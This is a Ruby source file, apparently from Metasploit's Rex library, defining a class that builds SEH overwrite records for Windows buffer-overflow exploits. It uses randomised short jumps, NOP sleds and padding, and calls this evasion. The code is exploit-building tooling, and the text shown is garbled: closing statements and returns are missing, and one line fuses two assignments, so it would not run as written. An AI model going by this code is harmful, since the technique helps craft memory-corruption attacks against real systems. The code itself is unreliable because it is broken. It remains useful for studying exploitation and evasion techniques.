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require 'rex/text'
require 'rex/arch/x86'
require 'rex/evasion'
module Rex
module Exploitation
# This class provides methods for generating SEH registration records
# in a dynamic and flexible fashion. The records can be generated with
# the short jump at a random offset into the next pointer and with random
# padding in between the handler and the attacker's payload.
class Seh
# The symbolic name of this evasion subsystem.
EvasionName = "exploitation.seh"
# Creates a new instance of the class and initializes it with the supplied
# bad character list. The space argument denotes how much room is
# available for random padding and the NOP argument can be used to generate
# a random NOP sled that is better than 0x90.
def initialize(badchars = nil, space = nil, nop = nil)
self.badchars = badchars || '' = (space && space > 121) ? 121 : space
self.nop = nop
# Return the default evasion level for this subsystem.
def default_evasion_level
# Generates an SEH record using whatever evasion level is currently defined
# globally for this subsystem or using one that is supplied by the caller.
# If HIGH evasion is specified, a dynamic SEH record is generated.
# Otherwise, a static SEH record is generated.
def generate_seh_record(handler, evlvl = default_evasion_level)
if (evlvl == EVASION_HIGH)
# Generates a fake SEH registration record with the supplied handler
# address for the handler, and a nop generator to use when generating
# padding inside the next pointer. The NOP generator must implement the
# 'generate_sled' method that takes a length and a list of bad
# characters.
def generate_dynamic_seh_record(handler)
# Generate the padding up to the size specified or 121 characters
# maximum to account for the maximum range of a short jump plus the
# record size.
pad = rand(space || 121)
rsize = pad + 8
# Calculate the random index into the next ptr to store the short jump
# instruction
jmpidx = rand(3)
# Build the prefixed sled for the bytes that come before the short jump
# instruction
sled = (nop) ? nop.generate_sled(jmpidx, badchars) : ("\x90" * jmpidx)
# Seed the record and any space after the record with random text
record = Rex::Text.rand_text(rsize, badchars)
# Build the next pointer and short jump instruction
record[jmpidx, 2] = Rex::Arch::X86.jmp_short((rsize - jmpidx) - 2)
record[0, jmpidx] = sled
# Set the handler in the registration record
record[4, 4] = [ handler ].pack('V')
# Return the generated record to the caller
# Generates a static SEH registration record with a specific handler and
# next pointer.
def generate_static_seh_record(handler)
"\xeb\x06" + Rex::Text.rand_text(2, badchars) + [ handler ].pack('V')
attr_accessor :badchars, :space, :nop # :nodoc:
# Register this evasion subsystem with the evasion instance.